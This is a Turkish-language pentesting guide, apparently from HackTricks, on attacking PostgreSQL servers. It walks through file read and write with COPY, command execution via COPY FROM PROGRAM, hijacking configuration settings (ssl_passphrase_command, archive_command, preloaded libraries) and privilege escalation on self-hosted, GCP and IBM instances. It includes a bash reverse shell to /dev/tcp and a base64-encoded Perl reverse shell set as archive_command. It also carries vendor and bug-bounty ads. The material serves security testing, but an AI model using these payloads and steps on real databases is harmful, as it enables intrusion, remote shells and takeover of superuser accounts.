5432,5433 - Pentesting Postgresql
Last updated
Last updated
Dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturmak ve otomatikleştirmek için Trickest kullanın. Bugün Erişim Alın:
PostgreSQL, açık kaynak bir nesne-ilişkisel veritabanı sistemi olarak tanımlanır. Bu sistem yalnızca SQL dilini kullanmakla kalmaz, aynı zamanda onu ek özelliklerle geliştirir. Yetenekleri, geniş bir veri türü ve işlem yelpazesini yönetmesine olanak tanır, bu da onu geliştiriciler ve organizasyonlar için çok yönlü bir seçim haline getirir.
Varsayılan port: 5432, ve bu port zaten kullanılıyorsa, postgresql'in kullanılmayan bir sonraki portu (muhtemelen 5433) kullanacağı görünmektedir.
Eğer \list
komutunu çalıştırdığınızda rdsadmin
adında bir veritabanı bulursanız, bir AWS postgresql veritabanası içinde olduğunuzu bilirsiniz.
Daha fazla bilgi için PostgreSQL veritabanını nasıl kötüye kullanacağınız hakkında kontrol edin:
PostgreSQL injectionBu araştırmaya göre, bir bağlantı denemesi başarısız olduğunda, dblink
bir hata açıklaması içeren sqlclient_unable_to_establish_sqlconnection
istisnası fırlatır. Bu detayların örnekleri aşağıda listelenmiştir.
Sunucu kapalı
DETAY: sunucuya bağlanılamadı: Host'a giden yol yok. Sunucu "1.2.3.4" adresinde çalışıyor mu ve 5678 numaralı portta TCP/IP bağlantılarını kabul ediyor mu?
Port kapalı
Port açık
or
Port açık veya filtrelenmiş
In PL/pgSQL fonksiyonlarında, şu anda istisna ayrıntılarını elde etmek mümkün değildir. Ancak, PostgreSQL sunucusuna doğrudan erişiminiz varsa, gerekli bilgileri alabilirsiniz. Sistem tablolarından kullanıcı adları ve şifreleri çıkarmak mümkün değilse, önceki bölümde tartışılan kelime listesi saldırı yöntemini kullanmayı düşünebilirsiniz, çünkü bu olumlu sonuçlar verebilir.
rolsuper
Rol süper kullanıcı ayrıcalıklarına sahiptir
rolinherit
Rol, üyesi olduğu rollerin ayrıcalıklarını otomatik olarak devralır
rolcreaterole
Rol daha fazla rol oluşturabilir
rolcreatedb
Rol veritabanları oluşturabilir
rolcanlogin
Rol giriş yapabilir. Yani, bu rol başlangıç oturum yetkilendirme tanımlayıcısı olarak verilebilir
rolreplication
Rol bir çoğaltma rolüdür. Bir çoğaltma rolü, çoğaltma bağlantılarını başlatabilir ve çoğaltma slotlarını oluşturup kaldırabilir.
rolconnlimit
Giriş yapabilen roller için, bu rolün yapabileceği maksimum eşzamanlı bağlantı sayısını ayarlar. -1 sınırsız anlamına gelir.
rolpassword
Şifre değil (her zaman ********
olarak okunur)
rolvaliduntil
Şifre sona erme zamanı (sadece şifre kimlik doğrulaması için kullanılır); sona erme yoksa null
rolbypassrls
Rol, her satır düzeyinde güvenlik politikasını atlar, daha fazla bilgi için Bölüm 5.8 bakın.
rolconfig
Çalışma zamanı yapılandırma değişkenleri için rol özel varsayılanları
oid
Rolün kimliği
Eğer pg_execute_server_program
üyesiyseniz, programları çalıştırabilirsiniz
Eğer pg_read_server_files
üyesiyseniz, dosyaları okuyabilirsiniz
Eğer pg_write_server_files
üyesiyseniz, dosyaları yazabilirsiniz
Postgres'te bir kullanıcı, bir grup ve bir rol aynıdır. Bu sadece nasıl kullandığınıza ve giriş yapmasına izin verip vermediğinize bağlıdır.
Bu commit ile tanımlanan DEFAULT_ROLE_READ_SERVER_FILES
grubunun ( pg_read_server_files
olarak adlandırılır) ve süper kullanıcıların herhangi bir yol üzerinde COPY
yöntemini kullanabileceğini görebilirsiniz ( genfile.c
içindeki convert_and_check_filename
'a bakın):
Unutmayın ki eğer süper kullanıcı değilseniz ama CREATEROLE izinleriniz varsa, kendinizi o grubun üyesi yapabilirsiniz:
Dosya okumak veya bir dizini listelemek için kullanılabilecek diğer postgres fonksiyonları vardır. Sadece süper kullanıcılar ve açık izinlere sahip kullanıcılar bunları kullanabilir:
Daha fazla fonksiyon bulabilirsiniz https://www.postgresql.org/docs/current/functions-admin.html
Sadece süper kullanıcılar ve pg_write_server_files
üyeleri dosya yazmak için kopya kullanabilir.
Unutmayın ki, süper kullanıcı değilseniz ama CREATEROLE
izinleriniz varsa, kendinizi o grubun üyesi yapabilirsiniz:
COPY'nin yeni satır karakterlerini işleyemediğini unutmayın, bu nedenle bir base64 yükü kullanıyor olsanız bile tek satırlık bir komut göndermeniz gerekir.
Bu tekniğin çok önemli bir sınırlaması, copy
'nin bazı ikili değerleri değiştirdiği için ikili dosyaları yazmak için kullanılamamasıdır.
Ancak, büyük ikili dosyaları yüklemek için başka teknikler vardır:
Big Binary Files Upload (PostgreSQL)Hata ödülü ipucu: Intigriti'ye kaydolun, hackerlar tarafından, hackerlar için oluşturulmuş premium bir hata ödülü platformu! Bugün https://go.intigriti.com/hacktricks adresine katılın ve $100,000'a kadar ödüller kazanmaya başlayın!
PostgreSQL sunucu dosyalarını okuma ve yazma yetkiniz varsa, ilişkili dosya düğümünü PostgreSQL veri dizininde değiştirerek sunucudaki herhangi bir tabloyu güncelleyebilirsiniz. Bu teknik hakkında daha fazla bilgi burada.
Gerekli adımlar:
PostgreSQL veri dizinini elde edin
Not: Ayarlardan mevcut veri dizini yolunu alamıyorsanız, SELECT version()
sorgusu aracılığıyla PostgreSQL'in ana sürümünü sorgulayabilir ve yolu brute-force ile bulmayı deneyebilirsiniz. PostgreSQL'in Unix kurulumlarındaki yaygın veri dizini yolları /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
şeklindedir. Yaygın bir küme adı main
dir. 2. Hedef tablo ile ilişkili dosya düğümüne göre göreli bir yol elde edin
Bu sorgu base/3/1337
gibi bir şey döndürmelidir. Diskteki tam yol $DATA_DIRECTORY/base/3/1337
, yani /var/lib/postgresql/13/main/base/3/1337
olacaktır. 3. lo_*
fonksiyonları aracılığıyla dosya düğümünü indirin
Hedef tablo ile ilişkili veri türünü alın
PostgreSQL Dosya Düğümü Editörü kullanarak dosya düğümünü düzenleyin; tüm rol*
boolean bayraklarını tam izinler için 1 olarak ayarlayın.
6. Düzenlenmiş dosya düğümünü lo_*
fonksiyonları aracılığıyla yeniden yükleyin ve diskteki orijinal dosyayı üzerine yazın
(İsteğe bağlı) Pahalı bir SQL sorgusu çalıştırarak bellek içi tablo önbelleğini temizleyin
Artık PostgreSQL'de güncellenmiş tablo değerlerini görmelisiniz.
Ayrıca pg_authid
tablosunu düzenleyerek süperadmin olabilirsiniz. Ayrıntılar için aşağıdaki bölüme bakın.
9.3 sürümünden itibaren yalnızca süper kullanıcılar ve pg_execute_server_program
grubunun üyeleri RCE için copy kullanabilir (sızdırma ile örnek:
Örnek exec:
Unutmayın ki eğer süper kullanıcı değilseniz ama CREATEROLE
izinleriniz varsa, kendinizi o grubun üyesi yapabilirsiniz:
Ya da metasploit'ten multi/postgres/postgres_copy_from_program_cmd_exec
modülünü kullanabilirsiniz.
Bu güvenlik açığı hakkında daha fazla bilgi burada. CVE-2019-9193 olarak rapor edilmesine rağmen, Postges bunun bir özellik olduğunu ve düzeltmeyeceklerini açıkladı.
Önceki yazıdan ikili dosyaları nasıl yükleyeceğinizi öğrendikten sonra, bir postgresql uzantısı yükleyerek ve yükleyerek RCE elde etmeyi deneyebilirsiniz.
RCE with PostgreSQL ExtensionsAşağıdaki RCE vektörleri, tüm adımların iç içe geçmiş SELECT ifadeleri aracılığıyla gerçekleştirilebileceği kısıtlı SQLi bağlamlarında özellikle yararlıdır.
PostgreSQL'ün yapılandırma dosyası, veritabanını çalıştıran postgres kullanıcısı tarafından yazılabilir, bu nedenle superuser olarak, dosya sisteminde dosyalar yazabilir ve dolayısıyla bu dosyayı üzerine yazabilirsiniz.
Bu teknik hakkında daha fazla bilgi burada.
Yapılandırma dosyasında RCE'ye yol açabilecek bazı ilginç özellikler vardır:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Veritabanının özel anahtarının yolu
ssl_passphrase_command = ''
Özel dosya şifreyle korunuyorsa (şifreli) postgresql bu özellikte belirtilen komutu çalıştıracaktır.
ssl_passphrase_command_supports_reload = off
Eğer bu özellik açık ise, şifreyle korunan anahtar için çalıştırılan komut, pg_reload_conf()
çalıştırıldığında çalıştırılacaktır.
O zaman bir saldırganın yapması gerekenler:
Sunucudan özel anahtarı dökme
İndirilen özel anahtarı şifreleme:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Üzerine yazma
Mevcut postgresql yapılandırmasını dökme
Belirtilen özellikler yapılandırması ile yapılandırmayı üzerine yazma:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
pg_reload_conf()
'ü çalıştırma
Bunu test ederken, bunun yalnızca özel anahtar dosyasının 640 ayrıcalığı varsa, root tarafından sahiplenilmişse ve ssl-cert veya postgres grubuna aitse (böylece postgres kullanıcısı onu okuyabilir) ve /var/lib/postgresql/12/main dizininde yer alıyorsa çalışacağını fark ettim.
Bu yapılandırma ve WAL hakkında daha fazla bilgi burada.
Yapılandırma dosyasında istismar edilebilecek bir diğer özellik archive_command
'dır.
Bunun çalışması için, archive_mode
ayarının 'on'
veya 'always'
olması gerekir. Eğer bu doğruysa, o zaman archive_command
içindeki komutu üzerine yazabilir ve WAL (write-ahead logging) işlemleri aracılığıyla çalıştırılmasını zorlayabiliriz.
Genel adımlar şunlardır:
Arşiv modunun etkin olup olmadığını kontrol et: SELECT current_setting('archive_mode')
archive_command
'ı yükle ile üzerine yaz. Örneğin, bir ters shell: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Yapılandırmayı yeniden yükle: SELECT pg_reload_conf()
Arşiv komutunu çağıracak WAL işleminin çalışmasını zorla: SELECT pg_switch_wal()
veya bazı Postgres sürümleri için SELECT pg_switch_xlog()
Bu teknik hakkında daha fazla bilgi burada.
Bu saldırı vektörü, aşağıdaki yapılandırma değişkenlerinden yararlanır:
session_preload_libraries
-- istemci bağlantısında PostgreSQL sunucusu tarafından yüklenecek kütüphaneler.
dynamic_library_path
-- PostgreSQL sunucusunun kütüphaneleri arayacağı dizinlerin listesi.
dynamic_library_path
değerini, veritabanını çalıştıran postgres
kullanıcısı tarafından yazılabilir bir dizine, örneğin /tmp/
dizinine ayarlayabiliriz ve oraya kötü niyetli bir .so
nesnesi yükleyebiliriz. Sonra, PostgreSQL sunucusunu, session_preload_libraries
değişkenine ekleyerek yeni yüklediğimiz kütüphaneyi yüklemeye zorlayacağız.
Saldırı adımları şunlardır:
Orijinal postgresql.conf
dosyasını indirin
/tmp/
dizinini dynamic_library_path
değerine ekleyin, örneğin dynamic_library_path = '/tmp:$libdir'
Kötü niyetli kütüphane adını session_preload_libraries
değerine ekleyin, örneğin session_preload_libraries = 'payload.so'
SELECT version()
sorgusu ile ana PostgreSQL sürümünü kontrol edin
Kötü niyetli kütüphane kodunu doğru PostgreSQL geliştirme paketi ile derleyin Örnek kod:
Kodu derleme:
Adım 2-3'te oluşturulan kötü niyetli postgresql.conf
dosyasını yükleyin ve orijinal dosyanın üzerine yazın
Adım 5'teki payload.so
dosyasını /tmp
dizinine yükleyin
Sunucu yapılandırmasını sunucuyu yeniden başlatarak veya SELECT pg_reload_conf()
sorgusunu çağırarak yeniden yükleyin
Bir sonraki DB bağlantısında, ters shell bağlantısını alacaksınız.
Belgeler'e göre: CREATEROLE
ayrıcalığına sahip roller, superuser olmayan herhangi bir role üyeliği verebilir veya geri alabilir.
Yani, eğer CREATEROLE
izniniz varsa, kendinize diğer roller (superuser olmayan) için erişim verebilir ve dosyaları okuma & yazma ve komutları çalıştırma seçeneği elde edebilirsiniz:
Bu role sahip kullanıcılar, diğer süper kullanıcı olmayan kullanıcıların şifrelerini de değiştirebilir:
Yerel kullanıcıların PostgreSQL'e herhangi bir şifre vermeden giriş yapabildiğini bulmak oldukça yaygındır. Bu nedenle, kod çalıştırma izinlerini topladıktan sonra bu izinleri kötüye kullanarak SUPERUSER
rolünü elde edebilirsiniz:
Bu genellikle pg_hba.conf
dosyasındaki aşağıdaki satırlar nedeniyle mümkündür:
Bu yazıda kullanıcılara verilen ALTER TABLE ayrıcalığını kötüye kullanarak Postgres GCP'de privesc'in nasıl mümkün olduğu açıklanmaktadır.
Başka bir kullanıcıyı bir tablonun sahibi yapmak istediğinizde, bunu engelleyen bir hata almanız gerekir, ancak görünüşe göre GCP, GCP'deki süper kullanıcı olmayan postgres kullanıcısına bu seçeneği vermiştir:
Bu fikri, INSERT/UPDATE/ANALYZE komutları bir indeks fonksiyonu olan bir tabloda çalıştırıldığında, fonksiyonun komutun bir parçası olarak tablo sahibinin izinleriyle çağrıldığını göz önünde bulundurarak birleştirirsek, bir fonksiyonla bir indeks oluşturmak ve o tablo üzerinde bir süper kullanıcıya sahiplik izinleri vermek mümkündür. Ardından, sahibin ayrıcalıklarını kullandığı için komutları çalıştırabilecek kötü niyetli fonksiyonla tablo üzerinde ANALYZE çalıştırılabilir.
Yeni bir tablo oluşturarak başlayın.
İndeks fonksiyonu için veri sağlamak amacıyla tabloya bazı alakasız içerikler ekleyin.
Yetkisiz komutların çalıştırılmasına izin veren bir kod yürütme yükü içeren kötü niyetli bir indeks fonksiyonu geliştirin.
Tablo sahibini "cloudsqladmin" olarak DEĞİŞTİRİN; bu, Cloud SQL'in veritabanını yönetmek ve bakımını yapmak için kullandığı GCP'nin süper kullanıcı rolüdür.
Tablo üzerinde bir ANALYZE işlemi gerçekleştirin. Bu işlem, PostgreSQL motorunu tablonun sahibi "cloudsqladmin" kullanıcısının bağlamına geçmeye zorlar. Sonuç olarak, kötü niyetli indeks fonksiyonu "cloudsqladmin" izinleriyle çağrılır ve böylece daha önce yetkisiz olan shell komutunun çalıştırılmasına olanak tanır.
PostgreSQL'de bu akış şöyle görünür:
Sonra, shell_commands_results
tablosu yürütülen kodun çıktısını içerecektir:
Bazı yanlış yapılandırılmış postgresql örnekleri, herhangi bir yerel kullanıcının girişine izin verebilir, dblink
fonksiyonu kullanarak 127.0.0.1'den yerel olarak giriş yapmak mümkündür:
Önceki sorgunun çalışması için dblink
fonksiyonunun mevcut olması gerektiğini unutmayın. Eğer mevcut değilse, onu oluşturmayı deneyebilirsiniz.
Eğer daha fazla yetkiye sahip bir kullanıcının şifresine sahipseniz, ancak bu kullanıcının harici bir IP'den giriş yapmasına izin verilmiyorsa, o kullanıcı olarak sorguları çalıştırmak için aşağıdaki fonksiyonu kullanabilirsiniz:
Bu fonksiyonun mevcut olup olmadığını kontrol etmek mümkündür:
Bu yazıda, pentesterlar IBM tarafından sağlanan bir postgres örneği içinde privesc yapmayı başardılar, çünkü SECURITY DEFINER bayrağına sahip bu fonksiyonu buldular:
Belgelerde açıklandığı gibi SECURITY DEFINER olan bir fonksiyon, onu sahip olan kullanıcının ayrıcalıklarıyla çalıştırılır. Bu nedenle, eğer fonksiyon SQL Injection'a karşı savunmasızsa veya saldırgan tarafından kontrol edilen parametrelerle bazı ayrıcalıklı işlemler yapıyorsa, bu durum postgres içinde ayrıcalıkları artırmak için kötüye kullanılabilir.
Önceki kodun 4. satırında fonksiyonun SECURITY DEFINER bayrağına sahip olduğunu görebilirsiniz.
Ve sonra komutları çalıştırın:
PL/pgSQL, SQL'e kıyasla daha fazla prosedürel kontrol sunan tam özellikli bir programlama dilidir. Program mantığını geliştirmek için döngüler ve diğer kontrol yapıları kullanma imkanı sağlar. Ayrıca, SQL ifadeleri ve tetikleyiciler, PL/pgSQL dili kullanılarak oluşturulan fonksiyonları çağırma yeteneğine sahiptir. Bu entegrasyon, veritabanı programlama ve otomasyonu için daha kapsamlı ve çok yönlü bir yaklaşım sağlar. Bu dili, PostgreSQL'den kullanıcı kimlik bilgilerini brute-force yapmasını istemek için kötüye kullanabilirsiniz.
PL/pgSQL Password BruteforceAşağıdaki yetki yükseltme vektörü, tüm adımların iç içe geçmiş SELECT ifadeleri aracılığıyla gerçekleştirilebilmesi nedeniyle özellikle kısıtlı SQLi bağlamlarında faydalıdır.
Eğer PostgreSQL sunucu dosyalarını okuyup yazabiliyorsanız, pg_authid
tablosuyla ilişkili PostgreSQL disk üzerindeki dosya düğümünü üzerine yazarak süper kullanıcı olabilirsiniz.
Bu teknik hakkında daha fazla bilgi için buraya** göz atın.**
Saldırı adımları şunlardır:
PostgreSQL veri dizinini elde edin
pg_authid
tablosuyla ilişkili dosya düğümüne göre bir göreli yol elde edin
lo_*
fonksiyonları aracılığıyla dosya düğümünü indirin
pg_authid
tablosuyla ilişkili veri türünü alın
PostgreSQL Dosya Düğümü Düzenleyicisi kullanarak dosya düğümünü düzenleyin; tam izinler için tüm rol*
boolean bayraklarını 1 olarak ayarlayın.
Düzenlenmiş dosya düğümünü lo_*
fonksiyonları aracılığıyla yeniden yükleyin ve diskteki orijinal dosyayı üzerine yazın
(İsteğe bağlı) Pahalı bir SQL sorgusu çalıştırarak bellek içi tablo önbelleğini temizleyin
Artık tam bir süperadminin ayrıcalıklarına sahip olmalısınız.
postgresql.conf dosyasının içinde postgresql günlüklerini etkinleştirmek için şunu değiştirebilirsiniz:
Sonra, servisi yeniden başlatın.
pgadmin, PostgreSQL için bir yönetim ve geliştirme platformudur. pgadmin4.db dosyasının içinde şifreler bulabilirsiniz. Bunları, aşağıdaki scriptteki decrypt fonksiyonunu kullanarak çözebilirsiniz: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
PostgreSQL'de istemci kimlik doğrulaması, pg_hba.conf adlı bir yapılandırma dosyası aracılığıyla yönetilmektedir. Bu dosya, her biri bir bağlantı türü, istemci IP adresi aralığı (varsa), veritabanı adı, kullanıcı adı ve eşleşen bağlantılar için kullanılacak kimlik doğrulama yöntemini belirten bir dizi kayıt içerir. Bağlantı türü, istemci adresi, istenen veritabanı ve kullanıcı adı ile eşleşen ilk kayıt kimlik doğrulama için kullanılır. Kimlik doğrulama başarısız olursa geri dönüş veya yedek yoktur. Hiçbir kayıt eşleşmezse, erişim reddedilir.
pg_hba.conf'da mevcut olan şifre tabanlı kimlik doğrulama yöntemleri md5, crypt ve password'dır. Bu yöntemler, şifrenin iletilme şekli açısından farklılık gösterir: MD5 hash'lenmiş, crypt şifrelenmiş veya düz metin. Crypt yönteminin pg_authid'de şifrelenmiş şifrelerle kullanılamayacağını belirtmek önemlidir.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)